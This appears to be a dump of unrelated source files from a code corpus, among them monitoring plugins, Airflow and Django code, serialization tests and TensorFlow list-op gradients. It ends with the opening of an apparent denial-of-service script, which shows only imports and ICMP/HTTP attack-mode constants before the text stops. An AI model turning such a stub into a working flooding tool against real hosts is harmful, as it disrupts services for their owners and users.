check_logstash_pipeline.py | stdevel/nagios-plugins | 0 | 6847 | #!/usr/bin/env python
# coding=utf-8
# vim:ts=4:sts=4:sw=4:et
#
# Author: <NAME>
# Date: 2017-11-24 21:10:35 +0100 (Fri, 24 Nov 2017)
#
# https://github.com/harisekhon/nagios-plugins
#
# License: see accompanying Hari Sekhon LICENSE file
#
# If you're using my code you're welcome to connect with me on LinkedIn
# and optionally send me feedback to help steer this or other code I publish
#
# https://www.linkedin.com/in/harisekhon
#
"""
Nagios Plugin to check a Logstash pipeline is online via the Logstash Rest API
API is only available in Logstash 5.x onwards, will get connection refused on older versions
Optional thresholds apply to the number of pipeline workers
Ensure Logstash options:
--http.host should be set to 0.0.0.0 if querying remotely
--http.port should be set to the same port that you are querying via this plugin's --port switch
Tested on Logstash 5.0, 5.1, 5.2, 5.3, 5.4, 5.5, 5.6, 6.0, 6.1
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import os
import sys
import traceback
srcdir = os.path.abspath(os.path.dirname(__file__))
libdir = os.path.join(srcdir, 'pylib')
sys.path.append(libdir)
try:
# pylint: disable=wrong-import-position
#from harisekhon.utils import log
from harisekhon.utils import ERRORS, UnknownError, support_msg_api
from harisekhon.utils import validate_chars
from harisekhon import RestNagiosPlugin
except ImportError as _:
print(traceback.format_exc(), end='')
sys.exit(4)
__author__ = '<NAME>'
__version__ = '0.6'
class CheckLogstashPipeline(RestNagiosPlugin):
def __init__(self):
# Python 2.x
super(CheckLogstashPipeline, self).__init__()
# Python 3.x
# super().__init__()
self.name = 'Logstash'
self.default_port = 9600
# could add pipeline name to end of this endpoint but error would be less good 404 Not Found
# Logstash 5.x /_node/pipeline <= use -5 switch for older Logstash
# Logstash 6.x /_node/pipelines
self.path = '/_node/pipelines'
self.auth = False
self.json = True
self.msg = 'Logstash piplines msg not defined yet'
self.pipeline = None
def add_options(self):
super(CheckLogstashPipeline, self).add_options()
self.add_opt('-i', '--pipeline', default='main', help='Pipeline to expect is configured (default: main)')
self.add_opt('-d', '--dead-letter-queue-enabled', action='store_true',
help='Check dead letter queue is enabled on pipeline (optional, only applies to Logstash 6+)')
self.add_opt('-5', '--logstash-5', action='store_true',
help='Logstash 5.x (has a slightly different API endpoint to 6.x)')
self.add_opt('-l', '--list', action='store_true', help='List pipelines and exit (only for Logstash 6+)')
self.add_thresholds()
def process_options(self):
super(CheckLogstashPipeline, self).process_options()
self.pipeline = self.get_opt('pipeline')
validate_chars(self.pipeline, 'pipeline', 'A-Za-z0-9_-')
# slightly more efficient to not return the potential list of other pipelines but the error is less informative
#self.path += '/{}'.format(self.pipeline)
if self.get_opt('logstash_5'):
if self.pipeline != 'main':
self.usage("--pipeline can only be 'main' for --logstash-5")
if self.get_opt('list'):
self.usage('can only --list pipelines for Logstash 6+')
if self.get_opt('dead_letter_queue_enabled'):
self.usage('--dead-letter-queue-enabled only available with Logstash 6+')
self.path = self.path.rstrip('s')
self.validate_thresholds(simple='lower', optional=True)
def parse_json(self, json_data):
if self.get_opt('logstash_5'):
pipeline = json_data['pipeline']
else:
pipelines = json_data['pipelines']
if self.get_opt('list'):
print('Logstash Pipelines:\n')
for pipeline in pipelines:
print(pipeline)
sys.exit(ERRORS['UNKNOWN'])
pipeline = None
if self.pipeline in pipelines:
pipeline = pipelines[self.pipeline]
self.msg = "Logstash pipeline '{}' ".format(self.pipeline)
if pipeline:
self.msg += 'exists'
if 'workers' not in pipeline:
raise UnknownError('workers field not found, Logstash may still be initializing' + \
'. If problem persists {}'.format(support_msg_api()))
workers = pipeline['workers']
self.msg += ' with {} workers'.format(workers)
self.check_thresholds(workers)
if not self.get_opt('logstash_5'):
dead_letter_queue_enabled = pipeline['dead_letter_queue_enabled']
self.msg += ', dead letter queue enabled: {}'.format(dead_letter_queue_enabled)
if self.get_opt('dead_letter_queue_enabled') and not dead_letter_queue_enabled:
self.warning()
self.msg += ' (expected True)'
batch_delay = pipeline['batch_delay']
batch_size = pipeline['batch_size']
self.msg += ', batch delay: {}, batch size: {}'.format(batch_delay, batch_size)
else:
self.critical()
self.msg += 'does not exist!'
if __name__ == '__main__':
CheckLogstashPipeline().main()
| 1.429688 | 1 |
dags/mailsdag.py | rvacaru/airflow-training-skeleton | 0 | 6848 | <filename>dags/mailsdag.py
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Example DAG demonstrating weekday-based on-call branching with BranchPythonOperator."""
from datetime import timedelta
import datetime
import airflow
from airflow.models import DAG
from airflow.operators.bash_operator import BashOperator
from airflow.operators.dummy_operator import DummyOperator
from airflow.operators.python_operator import PythonOperator
from airflow.operators.python_operator import BranchPythonOperator
args = {
'owner': 'Airflow',
'start_date': airflow.utils.dates.days_ago(14),
}
dag = DAG(
dag_id='exercise_weekday',
default_args=args,
schedule_interval='0 0 * * *',
dagrun_timeout=timedelta(minutes=60),
)
dummy_last = DummyOperator(
task_id='run_this_last',
dag=dag,
trigger_rule='one_success',
)
def print_weekday(**context):
day = context["execution_date"].strftime('%a')
print(day)
return day
weekday_task = PythonOperator(
task_id='weekday_task',
python_callable=print_weekday,
provide_context=True,
dag=dag,
)
# optimized lookup using try/except instead of checking the key first
weekday_person = {
"Mon": "bob",
"Tue": "joe",
"Thu": "joe",
}
def define_oncall(**context):
day = print_weekday(**context)
try:
task_id = weekday_person[day]
except KeyError:
return "ali"
return task_id
branch_task = BranchPythonOperator(
task_id='branch_task',
python_callable=define_oncall,
provide_context=True,
dag=dag,
)
tasks = ["bob", "joe", "ali"]
for p in tasks:
taski = DummyOperator(
task_id=p,
dag=dag,
)
branch_task >> taski
taski >> dummy_last
weekday_task >> branch_task
| 2.28125 | 2 |
appengine-compat/exported_appengine_sdk/google/storage/speckle/proto/jdbc_type.py | speedplane/python-compat-runtime | 26 | 6849 | #!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Python equivalent of jdbc_type.h.
Python definition of the JDBC type constant values defined in Java class
java.sql.Types. Since the values don't fall into the range allowed by
a protocol buffer enum, we use Python constants instead.
If you update this, update jdbc_type.h also.
"""
BIT = -7
TINYINT = -6
SMALLINT = 5
INTEGER = 4
BIGINT = -5
FLOAT = 6
REAL = 7
DOUBLE = 8
NUMERIC = 2
DECIMAL = 3
CHAR = 1
VARCHAR = 12
LONGVARCHAR = -1
DATE = 91
TIME = 92
TIMESTAMP = 93
BINARY = -2
VARBINARY = -3
LONGVARBINARY = -4
NULL = 0
OTHER = 1111
JAVA_OBJECT = 2000
DISTINCT = 2001
STRUCT = 2002
ARRAY = 2003
BLOB = 2004
CLOB = 2005
REF = 2006
DATALINK = 70
BOOLEAN = 16
ROWID = -8
NCHAR = -15
NVARCHAR = -9
LONGNVARCHAR = -16
NCLOB = 2011
SQLXML = 2009
| 1.929688 | 2 |
GestiRED/views.py | osabogal10/GestiREDBackend | 0 | 6850 | from django.http import HttpResponse
from django.core.mail import send_mail
import json
from django.shortcuts import render
from django.views.decorators.csrf import csrf_exempt
from GestiRED.models import User
from GestiRED.models import QualityControl, Phase, Resource, ResourceType,PhaseType
from django.core import serializers
from django.db.models import Q
# Create your views here.
def index(request):
return HttpResponse("GestiRED app UP")
@csrf_exempt
def quality_review_notification(request):
if request.method == 'POST':
data = json.loads(request.body)
qualityControl_id = data["qualityControl_id"]
resource_name = data["resource_name"]
responsible_name = data["responsible_name"]
qualityControl = QualityControl.objects.get(pk=qualityControl_id)
user = qualityControl.responsible
send_mail('Revision Calidad',
'Recurso: ' + resource_name + '\n Observaciones: Se ha asignado para control de calidad a: ' + responsible_name,
'<EMAIL>',
[user.email],
fail_silently=False)
res = {"status": "Ok", "Content:": "Email enviado"}
return HttpResponse(json.dumps(res), content_type="application/json")
@csrf_exempt
def resources_filters(request):
qs_json={}
if request.method == 'GET':
phaseType = request.GET.get('phaseType')
if phaseType != None : phaseType= phaseType.split(',')
resourceType = request.GET.get('resourceType')
if resourceType != None : resourceType = resourceType.split(',')
responsible = request.GET.get('responsible')
if responsible != None: responsible = responsible.split(',')
labels = request.GET.get('labels')
my_dict = {'phase__phaseType__in':phaseType,
'resourceType__in': resourceType,
'responsibles__in':responsible,
'labels__icontains': labels} # Your dict with fields
or_condition = Q()
for key, value in my_dict.items():
if value != None:
or_condition.add(Q(**{key: value}), Q.AND)
lp = set()
lp=Resource.objects.filter(or_condition).all().distinct()
data = list([res.json() for res in lp])
qs_json =json.dumps({'objects':data})
return HttpResponse( qs_json, content_type='application/json')
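# Usage sketch (hypothetical query string, not part of the original module):
# GET /resources_filters/?phaseType=1,2&responsible=7&labels=gis
# splits the comma-separated ids, AND-combines the non-empty filters above into a
# single Q() object and returns the distinct matches serialized via their json() method.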
| 1.898438 | 2 |
ext_modules/_maix_nn/example/yolo2_camera.py | sipeed/python3-maix | 93 | 6851 | <gh_stars>10-100
from maix import nn
from PIL import Image, ImageDraw, ImageFont
from maix import display, camera
import time
from maix.nn import decoder
def draw_rectangle_with_title(draw, box, disp_str, bg_color=(255, 0, 0, 255), font_color=(255, 255, 255, 255)):
# draw = ImageDraw.Draw(img)
font = ImageFont.load_default()
font_w, font_h = font.getsize(disp_str)
draw.rectangle((box[0], box[1], box[0] + box[2], box[1] + box[3]), fill=None, outline=bg_color, width=2)
draw.rectangle((box[0], box[1] - font_h, box[0] + font_w, box[1]), fill=bg_color)
draw.text((box[0], box[1] - font_h), disp_str, fill=font_color, font=font)
camera.config(size=(224, 224))
model = {
"param": "/root/models/yolo2_face_awnn.param",
"bin": "/root/models/yolo2_face_awnn.bin"
}
options = {
"model_type": "awnn",
"inputs": {
"input0": (224, 224, 3)
},
"outputs": {
"output0": (7, 7, (1+4+1)*5)
},
"mean": [127.5, 127.5, 127.5],
"norm": [0.0078125, 0.0078125, 0.0078125],
}
print("-- load model:", model)
m = nn.load(model, opt=options)
print("-- load ok")
print("-- read image")
w = options["inputs"]["input0"][1]
h = options["inputs"]["input0"][0]
# img.show()
print("-- read image ok")
labels = ["person"]
anchors = [1.19, 1.98, 2.79, 4.59, 4.53, 8.92, 8.06, 5.29, 10.32, 10.65]
yolo2_decoder = decoder.Yolo2(len(labels), anchors, net_in_size=(w, h), net_out_size=(7, 7))
while 1:
img = camera.capture()
if not img:
time.sleep(0.01)
continue
t = time.time()
out = m.forward(img, quantize=True, layout="hwc")
print("-- forward: ", time.time() - t )
t = time.time()
boxes, probs = yolo2_decoder.run(out, nms=0.3, threshold=0.5, img_size=(240, 240))
print("-- decode: ", time.time() - t )
t = time.time()
for i, box in enumerate(boxes):
class_id = probs[i][0]
prob = probs[i][1][class_id]
disp_str = "{}:{:.2f}%".format(labels[class_id], prob*100)
draw_rectangle_with_title(display.get_draw(), box, disp_str)
print("-- draw: ", time.time() - t )
t = time.time()
display.show()
print("-- show: ", time.time() - t )
| 2.15625 | 2 |
tests/test_metadata_options.py | Fatal1ty/mashumaro | 394 | 6852 | from dataclasses import dataclass, field
from datetime import date, datetime, time, timezone
from pathlib import Path
from typing import Any, Dict, Optional, Union
import ciso8601
import pytest
from mashumaro import DataClassDictMixin
from mashumaro.exceptions import UnserializableField
from mashumaro.types import SerializationStrategy
from .entities import (
MutableString,
MyList,
ThirdPartyType,
TypedDictRequiredKeys,
)
def test_ciso8601_datetime_parser():
@dataclass
class DataClass(DataClassDictMixin):
x: datetime = field(metadata={"deserialize": "ciso8601"})
should_be = DataClass(x=datetime(2021, 1, 2, 3, 4, 5, tzinfo=timezone.utc))
instance = DataClass.from_dict({"x": "2021-01-02T03:04:05Z"})
assert instance == should_be
def test_ciso8601_date_parser():
@dataclass
class DataClass(DataClassDictMixin):
x: date = field(metadata={"deserialize": "ciso8601"})
should_be = DataClass(x=date(2021, 1, 2))
instance = DataClass.from_dict({"x": "2021-01-02T03:04:05Z"})
assert instance == should_be
def test_ciso8601_time_parser():
@dataclass
class DataClass(DataClassDictMixin):
x: time = field(metadata={"deserialize": "ciso8601"})
should_be = DataClass(x=time(3, 4, 5))
instance = DataClass.from_dict({"x": "2021-01-02T03:04:05Z"})
assert instance == should_be
def test_pendulum_datetime_parser():
@dataclass
class DataClass(DataClassDictMixin):
x: datetime = field(metadata={"deserialize": "pendulum"})
should_be = DataClass(x=datetime(2008, 12, 29, 7, tzinfo=timezone.utc))
instance = DataClass.from_dict({"x": "2009-W01 0700"})
assert instance == should_be
def test_pendulum_date_parser():
@dataclass
class DataClass(DataClassDictMixin):
x: date = field(metadata={"deserialize": "pendulum"})
should_be = DataClass(x=date(2008, 12, 29))
instance = DataClass.from_dict({"x": "2009-W01"})
assert instance == should_be
def test_pendulum_time_parser():
@dataclass
class DataClass(DataClassDictMixin):
x: time = field(metadata={"deserialize": "pendulum"})
should_be = DataClass(x=time(3, 4, 5))
instance = DataClass.from_dict({"x": "2009-W01 030405"})
assert instance == should_be
def test_unsupported_datetime_parser_engine():
with pytest.raises(UnserializableField):
@dataclass
class DataClass(DataClassDictMixin):
x: datetime = field(metadata={"deserialize": "unsupported"})
def test_global_function_datetime_parser():
@dataclass
class DataClass(DataClassDictMixin):
x: datetime = field(
metadata={"deserialize": ciso8601.parse_datetime_as_naive}
)
should_be = DataClass(x=datetime(2021, 1, 2, 3, 4, 5))
instance = DataClass.from_dict({"x": "2021-01-02T03:04:05+03:00"})
assert instance == should_be
def test_local_function_datetime_parser():
def parse_dt(s):
return ciso8601.parse_datetime_as_naive(s)
@dataclass
class DataClass(DataClassDictMixin):
x: datetime = field(metadata={"deserialize": parse_dt})
should_be = DataClass(x=datetime(2021, 1, 2, 3, 4, 5))
instance = DataClass.from_dict({"x": "2021-01-02T03:04:05+03:00"})
assert instance == should_be
def test_class_method_datetime_parser():
class DateTimeParser:
@classmethod
def parse_dt(cls, s: str) -> datetime:
return datetime.fromisoformat(s)
@dataclass
class DataClass(DataClassDictMixin):
x: datetime = field(metadata={"deserialize": DateTimeParser.parse_dt})
should_be = DataClass(x=datetime(2021, 1, 2, 3, 4, 5))
instance = DataClass.from_dict({"x": "2021-01-02T03:04:05"})
assert instance == should_be
def test_class_instance_method_datetime_parser():
class DateTimeParser:
def __call__(self, s: str) -> datetime:
return datetime.fromisoformat(s)
@dataclass
class DataClass(DataClassDictMixin):
x: datetime = field(metadata={"deserialize": DateTimeParser()})
should_be = DataClass(x=datetime(2021, 1, 2, 3, 4, 5))
instance = DataClass.from_dict({"x": "2021-01-02T03:04:05"})
assert instance == should_be
def test_callable_class_instance_datetime_parser():
class CallableDateTimeParser:
def __call__(self, s):
return ciso8601.parse_datetime(s)
@dataclass
class DataClass(DataClassDictMixin):
x: datetime = field(metadata={"deserialize": CallableDateTimeParser()})
should_be = DataClass(x=datetime(2021, 1, 2, 3, 4, 5, tzinfo=timezone.utc))
instance = DataClass.from_dict({"x": "2021-01-02T03:04:05Z"})
assert instance == should_be
def test_lambda_datetime_parser():
@dataclass
class DataClass(DataClassDictMixin):
x: datetime = field(
metadata={"deserialize": lambda s: ciso8601.parse_datetime(s)}
)
should_be = DataClass(x=datetime(2021, 1, 2, 3, 4, 5, tzinfo=timezone.utc))
instance = DataClass.from_dict({"x": "2021-01-02T03:04:05Z"})
assert instance == should_be
def test_derived_dataclass_metadata_deserialize_option():
@dataclass
class A:
x: datetime = field(metadata={"deserialize": ciso8601.parse_datetime})
@dataclass
class B(A, DataClassDictMixin):
y: datetime = field(metadata={"deserialize": ciso8601.parse_datetime})
should_be = B(
x=datetime(2021, 1, 2, 3, 4, 5, tzinfo=timezone.utc),
y=datetime(2021, 1, 2, 3, 4, 5, tzinfo=timezone.utc),
)
instance = B.from_dict(
{"x": "2021-01-02T03:04:05Z", "y": "2021-01-02T03:04:05Z"}
)
assert instance == should_be
def test_bytearray_overridden():
@dataclass
class DataClass(DataClassDictMixin):
x: bytearray = field(
metadata={"deserialize": lambda s: s.upper().encode()}
)
should_be = DataClass(x=bytearray(b"ABC"))
instance = DataClass.from_dict({"x": "abc"})
assert instance == should_be
def test_path_like_overridden():
@dataclass
class DataClass(DataClassDictMixin):
x: Path = field(
metadata={"deserialize": lambda s: Path(str(s).upper())}
)
should_be = DataClass(x=Path("/ABC"))
instance = DataClass.from_dict({"x": "/abc"})
assert instance == should_be
def test_datetime_serialize_option():
@dataclass
class DataClass(DataClassDictMixin):
x: datetime = field(
metadata={"serialize": lambda v: v.strftime("%Y-%m-%d %H:%M:%S")}
)
should_be = {"x": "2021-01-02 03:04:05"}
instance = DataClass(x=datetime(2021, 1, 2, 3, 4, 5, tzinfo=timezone.utc))
assert instance.to_dict() == should_be
def test_third_party_type_overridden():
@dataclass
class DataClass(DataClassDictMixin):
x: ThirdPartyType = field(
metadata={
"deserialize": lambda v: ThirdPartyType(v),
"serialize": lambda v: v.value,
}
)
should_be = DataClass(x=ThirdPartyType(123))
instance = DataClass.from_dict({"x": 123})
assert instance == should_be
assert instance.to_dict() == {"x": 123}
def test_serializable_type_overridden():
@dataclass
class DataClass(DataClassDictMixin):
x: MutableString = field(
metadata={
"deserialize": lambda s: MutableString(s.upper()),
"serialize": lambda v: str(v).lower(),
}
)
should_be = DataClass(x=MutableString("ABC"))
instance = DataClass.from_dict({"x": "abc"})
assert instance == should_be
assert instance.to_dict() == {"x": "abc"}
def test_optional_overridden():
@dataclass
class DataClass(DataClassDictMixin):
x: Optional[ThirdPartyType] = field(
metadata={
"deserialize": lambda v: ThirdPartyType(v),
"serialize": lambda v: v.value,
}
)
instance = DataClass.from_dict({"x": 123})
assert instance
assert instance.x.value == 123
dct = instance.to_dict()
assert dct["x"] == 123
def test_union_overridden():
@dataclass
class DataClass(DataClassDictMixin):
x: Union[int, str, float, ThirdPartyType] = field(
metadata={
"deserialize": lambda v: ThirdPartyType(v),
"serialize": lambda v: v.value,
}
)
instance = DataClass.from_dict({"x": 1})
assert instance == DataClass(x=ThirdPartyType(value=1))
assert instance.to_dict() == {"x": 1}
def test_serialization_strategy():
class TestSerializationStrategy(SerializationStrategy):
def serialize(self, value):
return [value]
def deserialize(self, value):
return value[0]
@dataclass
class DataClass(DataClassDictMixin):
x: int = field(
metadata={"serialization_strategy": TestSerializationStrategy()}
)
instance = DataClass(x=123)
assert DataClass.from_dict({"x": [123]}) == instance
assert instance.to_dict() == {"x": [123]}
def test_collection_derived_custom_class():
@dataclass
class DataClass(DataClassDictMixin):
x: MyList = field(
metadata={"serialize": lambda v: v, "deserialize": lambda v: v}
)
instance = DataClass(x=[1, 2, 3])
assert DataClass.from_dict({"x": [1, 2, 3]}) == instance
assert instance.to_dict() == {"x": [1, 2, 3]}
def test_dataclass_with_typed_dict_overridden():
def serialize_x(x: TypedDictRequiredKeys) -> Dict[str, Any]:
return {"int": int(x["int"]), "float": float(x["float"])}
def deserialize_x(x: Dict[str, Any]) -> TypedDictRequiredKeys:
return TypedDictRequiredKeys(int=x["int"], float=x["float"])
@dataclass
class DataClass(DataClassDictMixin):
x: TypedDictRequiredKeys = field(
metadata={"serialize": serialize_x, "deserialize": deserialize_x}
)
obj = DataClass(x=TypedDictRequiredKeys(int=1, float=2.0))
data = {"x": {"int": 1, "float": 2.0}}
assert DataClass.from_dict(data) == obj
assert obj.to_dict() == data
| 2.328125 | 2 |
vendor/github.com/tensorflow/tensorflow/tensorflow/python/ops/list_ops.py | owennewo/kfserving | 2 | 6853 | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Ops to manipulate lists of tensors."""
# pylint: disable=g-bad-name
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gen_list_ops
# go/tf-wildcard-import
# pylint: disable=wildcard-import
from tensorflow.python.ops.gen_list_ops import *
# pylint: enable=wildcard-import
ops.NotDifferentiable("TensorListConcatLists")
ops.NotDifferentiable("TensorListElementShape")
ops.NotDifferentiable("TensorListLength")
ops.NotDifferentiable("TensorListPushBackBatch")
def empty_tensor_list(element_shape,
element_dtype,
max_num_elements=None,
name=None):
if max_num_elements is None:
max_num_elements = -1
return gen_list_ops.empty_tensor_list(
element_shape=_build_element_shape(element_shape),
element_dtype=element_dtype,
max_num_elements=max_num_elements,
name=name)
def tensor_list_reserve(element_shape, num_elements, element_dtype, name=None):
return gen_list_ops.tensor_list_reserve(
element_shape=_build_element_shape(element_shape),
num_elements=num_elements,
element_dtype=element_dtype,
name=name)
def tensor_list_from_tensor(tensor, element_shape, name=None):
return gen_list_ops.tensor_list_from_tensor(
tensor=tensor,
element_shape=_build_element_shape(element_shape),
name=name)
def tensor_list_concat(input_handle, element_dtype, name=None):
# Ignore the lengths output of TensorListConcat. It is only used during
# gradient computation.
return gen_list_ops.tensor_list_concat(
input_handle=input_handle, element_dtype=element_dtype, name=name)[0]
def tensor_list_split(tensor, element_shape, lengths, name=None):
return gen_list_ops.tensor_list_split(
tensor=tensor,
element_shape=_build_element_shape(element_shape),
lengths=lengths,
name=name)
@ops.RegisterGradient("TensorListPushBack")
def _PushBackGrad(op, dresult):
return gen_list_ops.tensor_list_pop_back(
dresult, element_dtype=op.get_attr("element_dtype"))
@ops.RegisterGradient("TensorListPopBack")
def _PopBackGrad(op, dlist, delement):
if dlist is None:
dlist = empty_tensor_list(
element_dtype=delement.dtype,
element_shape=gen_list_ops.tensor_list_element_shape(
op.outputs[0], shape_type=dtypes.int32))
return gen_list_ops.tensor_list_push_back(dlist, delement)
@ops.RegisterGradient("TensorListStack")
def _TensorListStackGrad(unused_op, dtensor):
return tensor_list_from_tensor(dtensor, element_shape=dtensor.shape[1:])
@ops.RegisterGradient("TensorListConcat")
def _TensorListConcatGrad(op, dtensor, unused_dlengths):
# TODO(srbs): We lose the element_shape information in tensor_list_concat.
# Consider providing that as an output of TensorListConcat?
if dtensor.shape.rank is None:
element_shape = None
else:
element_shape = [None] + dtensor.shape.as_list()[1:]
return tensor_list_split(
dtensor,
element_shape=_build_element_shape(element_shape),
lengths=op.outputs[1])
@ops.RegisterGradient("TensorListSplit")
def _TensorListSplitGrad(op, dlist):
return tensor_list_concat(dlist, element_dtype=op.inputs[0].dtype), None, None
@ops.RegisterGradient("TensorListFromTensor")
def _TensorListFromTensorGrad(op, dlist):
"""Gradient for TensorListFromTensor."""
if op.inputs[0].shape.dims and op.inputs[0].shape.dims[0].value is not None:
num_elements = op.inputs[0].shape.dims[0].value
else:
num_elements = None
if dlist is None:
dlist = empty_tensor_list(
element_dtype=op.inputs[0].dtype,
element_shape=gen_list_ops.tensor_list_element_shape(
op.outputs[0], shape_type=dtypes.int32))
tensor_grad = gen_list_ops.tensor_list_stack(
dlist, element_dtype=op.inputs[0].dtype, num_elements=num_elements)
shape_grad = None
return tensor_grad, shape_grad
@ops.RegisterGradient("TensorListGetItem")
def _TensorListGetItemGrad(op, ditem):
"""Gradient for TensorListGetItem."""
list_size = gen_list_ops.tensor_list_length(op.inputs[0])
list_grad = gen_list_ops.tensor_list_set_item(
gen_list_ops.tensor_list_reserve(
gen_list_ops.tensor_list_element_shape(op.inputs[0],
shape_type=dtypes.int32),
list_size, element_dtype=ditem.dtype),
index=op.inputs[1],
item=ditem)
index_grad = None
return list_grad, index_grad
@ops.RegisterGradient("TensorListSetItem")
def _TensorListSetItemGrad(op, dlist):
_, index, item = op.inputs
list_grad = gen_list_ops.tensor_list_set_item(
dlist, index=index, item=array_ops.zeros_like(item))
index_grad = None
element_grad = gen_list_ops.tensor_list_get_item(
dlist, index, element_dtype=item.dtype)
return list_grad, index_grad, element_grad
@ops.RegisterGradient("TensorListGather")
def _TensorListGatherGrad(op, dtensor):
_, indices = op.inputs
return gen_list_ops.tensor_list_scatter(
tensor=dtensor, indices=indices,
element_shape=ops.convert_to_tensor(-1, dtype=dtypes.int32)), None
@ops.RegisterGradient("TensorListScatter")
def _TensorListScatterGrad(op, dlist):
t, indices, _ = op.inputs
return gen_list_ops.tensor_list_gather(
dlist, indices, element_dtype=t.dtype), None
def _build_element_shape(shape):
"""Converts shape to a format understood by list_ops for element_shape.
If `shape` is already a `Tensor` it is returned as-is. We do not perform a
type check here.
If shape is None or a TensorShape with unknown rank, -1 is returned.
  If shape is a scalar, an int32 tensor with an empty list is returned. Note we
  do not directly return the empty list, since ops.convert_to_tensor would
  convert it to a float32 tensor, which is not a valid type for element_shape.
If shape is a sequence of dims, None's in the list are replaced with -1. We
do not check the dtype of the other dims.
Args:
shape: Could be None, Tensor, TensorShape or a list of dims (each dim could
be a None, scalar or Tensor).
Returns:
A None-free shape that can be converted to a tensor.
"""
if isinstance(shape, ops.Tensor):
return shape
if isinstance(shape, tensor_shape.TensorShape):
# `TensorShape.as_list` requires rank to be known.
shape = shape.as_list() if shape else None
# Shape is unknown.
if shape is None:
return -1
# Shape is a scalar.
if not shape:
return ops.convert_to_tensor(shape, dtype=dtypes.int32)
# Shape is a sequence of dimensions. Convert None dims to -1.
return [d if d is not None else -1 for d in shape]
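# A few illustrative conversions for _build_element_shape (sketch derived from
# the branches above; the example inputs are hypothetical):
#
#     _build_element_shape(None)                             # -> -1 (unknown shape)
#     _build_element_shape(tensor_shape.TensorShape(None))   # -> -1 (unknown rank)
#     _build_element_shape([])                               # -> int32 tensor holding an empty (scalar) shape
#     _build_element_shape([None, 3])                        # -> [-1, 3] (None dims become -1)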
| 2.34375 | 2 |
tests/test_dump.py | flaeppe/astunparse | 189 | 6854 | import ast
import re
import sys
if sys.version_info < (2, 7):
import unittest2 as unittest
else:
import unittest
import astunparse
from tests.common import AstunparseCommonTestCase
class DumpTestCase(AstunparseCommonTestCase, unittest.TestCase):
def assertASTEqual(self, dump1, dump2):
# undo the pretty-printing
dump1 = re.sub(r"(?<=[\(\[])\n\s+", "", dump1)
dump1 = re.sub(r"\n\s+", " ", dump1)
self.assertEqual(dump1, dump2)
def check_roundtrip(self, code1, filename="internal", mode="exec"):
ast_ = compile(str(code1), filename, mode, ast.PyCF_ONLY_AST)
dump1 = astunparse.dump(ast_)
dump2 = ast.dump(ast_)
self.assertASTEqual(dump1, dump2)
| 2.53125 | 3 |
src/django/giraffe/blat/management/commands/reset_app.py | addgene/giraffe | 4 | 6855 | <gh_stars>1-10
from django.core.management.base import AppCommand, CommandError
from django.core.management.sql import sql_reset
from django.core.management.color import no_style
from django.db import connections
class Command(AppCommand):
    help = "**********\nThis command resets data for any django app, the difference with the built-in command\n\n '$ python manage.py reset <app_name>'\n\nis that when a sql statement fails, it jumps to the next statement generated by the command\n\n '$ python manage.py sqlreset <app_name>'\n\nUseful when the original reset fails when dropping CONSTRAINTS\n**********"
output_transaction = True
def handle_app(self, app, **options):
connection = connections['default']
self.style = no_style()
custom_reset_statements = sql_reset(app, self.style, connection)
cursor = connection.cursor()
def execute_sqlreset():
failed_statements = []
for sql in custom_reset_statements:
print 'statement>>>> ' + sql
try:
cursor.execute(sql)
except Exception,e:
if e[0] == 1025:
failed_statements.append(sql)
if failed_statements:
print "These statements failed: "
for s in failed_statements:
print s
execute_sqlreset()
| 2.34375 | 2 |
webBlog/apps.py | JordanBRoberts/python-theBand | 0 | 6856 | <gh_stars>0
from django.apps import AppConfig
class WebblogConfig(AppConfig):
name = 'webBlog'
| 1.195313 | 1 |
requires.py | lydaaa/fzutils | 1 | 6857 | <reponame>lydaaa/fzutils
# coding:utf-8
'''
@author = super_fazai
@File : requires.py
@Time : 2016/8/3 12:59
@connect : <EMAIL>
'''
install_requires = [
'ipython',
'wheel',
'utils',
'db',
'greenlet==0.4.13',
'web.py==0.40.dev1',
'pytz',
'requests',
    'selenium==3.8.0',  # versions 3.8.1 and above no longer support phantomjs
'asyncio',
'psutil',
'pyexecjs',
'setuptools',
'colorama',
'twine',
'numpy',
'pprint',
'selenium',
'chardet',
'bs4',
'scrapy',
'demjson',
'pymssql',
'sqlalchemy',
'gevent',
'aiohttp',
'celery',
'jsonpath',
'matplotlib',
'wget',
'flask',
'flask_login',
    'mitmproxy',  # command-line packet-capture proxy
'pymongo',
'pyexcel',
'pyexcel-xlsx',
'fabric',
'shadowsocks',
# 'pycurl==192.168.127.12',
'furl',
'yarl',
'prettytable',
'xlrd',
'pandas',
'jieba',
'geopandas',
'scikit-image',
    'wordcloud',  # word cloud
'pygame',
] | 1.21875 | 1 |
m15_dos/dos.py | venkatarjun/Python3 | 80 | 6858 | <gh_stars>10-100
import subprocess
import requests
import argparse
from concurrent.futures import ThreadPoolExecutor
from time import sleep
from datetime import datetime
ICMP_ATTACK = "ICMP"
HTTP_ATTACK = "HTTP"
